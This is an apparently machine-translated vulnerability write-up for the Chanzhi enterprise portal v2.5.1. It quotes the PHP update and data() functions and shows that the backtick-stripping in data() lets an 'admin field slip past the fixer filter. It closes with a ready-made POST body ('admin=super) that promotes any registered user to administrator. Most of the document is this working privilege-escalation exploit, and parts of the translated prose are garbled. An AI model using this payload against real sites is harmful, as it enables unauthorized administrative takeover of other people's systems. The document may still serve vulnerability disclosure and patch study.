Chanzhi enterprise portal system v2.5.1 bypass patches to continue Injection
/System/module/user/model. php
public function update($account) { /* If the user want to change his password. */ if($this->post->password1 != false) { $this->checkPassword(); if(dao::isError()) return false; $password = $this->createPassword($this->post->password1, $account); $this->post->set('password', $password); } $user = fixer::input('post') ->cleanInt('imobile, qq, zipcode') ->setDefault('admin', 'no') ->remove('ip, account, join, visits') ->removeIF(RUN_MODE != 'admin', 'admin') ->get(); return $this->dao->update(TABLE_USER) ->data($user, $skip = 'password1,password2') ->autoCheck() ->batchCheck($this->config->user->require->edit, 'notempty') ->check('email', 'email') ->check('email', 'unique', "account!='$account'") ->checkIF($this->post->gtalk != false, 'gtalk', 'email') ->where('account')->eq($account) ->exec(); }
The fixer class detects the admin field.
See
/System/lib/dao. class. php
Data () ()
*/ public function data($data, $skipFields = '') { $this->data = $data; if($skipFields) $skipFields = ',' . str_replace(' ', '', $skipFields) . ','; foreach($data as $field => $value) { $field = str_replace('`', '', $field); $field = str_replace(',', '', $field); if(strpos($skipFields, ",$field,") !== false) continue; $this->sql .= "`$field` = " . $this->quote($value) . ','; } $this->sql = rtrim($this->sql, ','); // Remove the last ','. return $this; }
The 'symbol is removed.
After submitting the 'admin bypass detection, go to data () and remove it. 'The system is restored,
This increases the administrator privilege.
Registered User modify data post
Realname = aaaaaa '& email = z % 40qq.com & password1 = & password2 = & company = & address = & zipcode = & mobile = & phone = & 'admin = super
To the administrator.